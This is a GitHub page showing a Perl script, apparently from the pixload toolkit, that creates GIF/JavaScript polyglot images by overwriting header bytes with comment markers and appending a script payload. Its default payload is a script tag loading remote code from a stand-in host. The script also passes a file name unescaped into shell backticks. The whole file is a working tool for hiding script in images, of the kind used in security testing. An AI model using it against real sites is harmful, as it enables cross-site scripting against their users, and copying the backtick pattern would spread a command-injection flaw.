-
Notifications
You must be signed in to change notification settings - Fork 239
/
pixload-gif.in
143 lines (108 loc) · 3.78 KB
/
pixload-gif.in
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
#!/usr/bin/env perl
#
# GIF Payload Creator/Injector
#
# coded by sighook <alexandr.savca89@gmail.com>
# credits to Marco Ramilli <https://marcoramilli.com>
#
# See LICENSE file for copyright and license details.
#
use strict;
use warnings;
use feature 'say';
use POSIX;
use Getopt::Long qw(:config no_ignore_case);
use File::Basename;
use constant PROGRAM => basename $0;
use constant VERSION => '@VERSION@';
use GD;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Default Options #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
my %opts = (
pixelwidth => 32,
pixelheight => 32,
payload => '<script src=//example.com></script>',
);
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Subroutines #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
sub create_gif {
say "[>] Generating output file";
my $img = GD::Image->new(
$opts{pixelwidth},
$opts{pixelheight},
# set 1 to TrueColor (24 bits of color data), default is 8-bit palette
1,
);
my $color = $img->colorAllocate(0, 0, 0);
$img->setPixel(0, 0, $color);
sysopen my $fh, $opts{FILE}, O_CREAT|O_WRONLY;
syswrite $fh, $img->gif;
close $fh;
say "[✔] File saved to: $opts{FILE}\n";
}
sub inject_payload {
say "[>] Injecting payload into $opts{FILE}";
sysopen my $fh, $opts{FILE}, O_WRONLY;
sysseek $fh, 6, SEEK_SET;
syswrite $fh, "\x2f\x2a";
sysseek $fh, 0, SEEK_END;
syswrite $fh, "\x2a\x2f\x3d\x31\x3b";
syswrite $fh, $opts{payload};
syswrite $fh, "\x3b";
close $fh;
say "[✔] Payload was injected successfully\n";
}
sub banner {
<<EOF;
...... GIF Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
EOF
}
sub usage {
<<"EOF";
Usage: @{[ PROGRAM ]} [OPTION]... FILE
Hide payload/malicious code in GIF images.
Mandatory arguments to long options are mandatory for short options too.
-W, --pixelwidth INTEGER (has no effect)
set pixel width for the new image (default: 10799)
-H, --pixelheight INTEGER set pixel height for the new image (default: 32)
-P, --payload STRING set payload for injection
-v, --version print version and exit
-h, --help print help and exit
The option -W, --pixelwidth has no effect since @{[ PROGRAM ]} rewrites
pixel width bytes with "/*" characters, to prepare the polyglot gif image.
If the output FILE already exists, then the payload will be injected into this
existing file. Otherwise, the new one will be created with specified pixels
wide.
EOF
}
sub version {
PROGRAM . " " . VERSION;
}
sub main {
# command-line options
GetOptions(
'h|help!' => \$opts{help},
'v|version!' => \$opts{version},
'P|payload=s' => \$opts{payload},
'W|pixelwidth=i' => \$opts{pixelwidth},
'H|pixelheight=i' => \$opts{pixelheight},
) or die "$!\n";
$opts{FILE} = shift @ARGV;
say &usage and exit(0) if $opts{help};
say &version and exit(0) if $opts{version};
say &usage and exit(1) if ! $opts{FILE};
say &banner;
&create_gif if ! -f $opts{FILE};
&inject_payload;
if (-f '/usr/bin/file' ) { say `file $opts{FILE}` }
if (-f '/usr/bin/hexdump') { say `hexdump -C $opts{FILE}` }
elsif (-f '/usr/bin/xxd' ) { say `xxd $opts{FILE}` }
}
&main;
# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file.